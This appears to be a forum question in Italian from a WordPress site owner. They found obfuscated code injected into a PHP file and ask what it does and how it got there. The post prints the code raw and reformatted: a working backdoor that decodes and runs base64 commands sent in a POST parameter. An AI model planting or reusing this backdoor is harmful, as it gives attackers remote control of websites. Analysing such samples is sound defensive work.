Il mio sito è stato creato usando Wordpress. Un giorno ha smesso di funzionare e ha rilevato un errore in un file PHP.
Quando ho scaricato quel file PHP per vedere cosa è successo, il mio antivirus (Microsoft Security Essentials) lo rileva come una minaccia e cancella il file scaricato.
Fortunatamente posso accedere al cPanel del mio hosting e modificare il file PHP problematico da lì.
Ho trovato che un codice insolito è stato aggiunto all'inizio del codice. (Ho cancellato il codice e tutto funziona correttamente, per ora)
Ecco il codice:
<?php $lro89 = "t_cepodas6b4";$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]); if (isset (${$scs1 }[ 'n3d9ebc' ])) {eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;}?>
Riformattato per la leggibilità:
<?php
$lro89 = "t_cepodas6b4";
$gmat6 =strtolower( $lro89[10]. $lro89[7]. $lro89[8]. $lro89[3] . $lro89[9].$lro89[11].$lro89[1] . $lro89[6].$lro89[3]. $lro89[2].$lro89[5].$lro89[6].$lro89[3]);
$scs1 =strtoupper ( $lro89[1]. $lro89[4]. $lro89[5].$lro89[8]. $lro89[0]);
if (isset (${$scs1 }[ 'n3d9ebc' ])) {
eval($gmat6( ${ $scs1} ['n3d9ebc' ])) ;
}
?>
Ho alcune domande:
- Che cosa fa il codice?
- Significa che c'è un virus?
- Come può essere iniettato solo su questo file?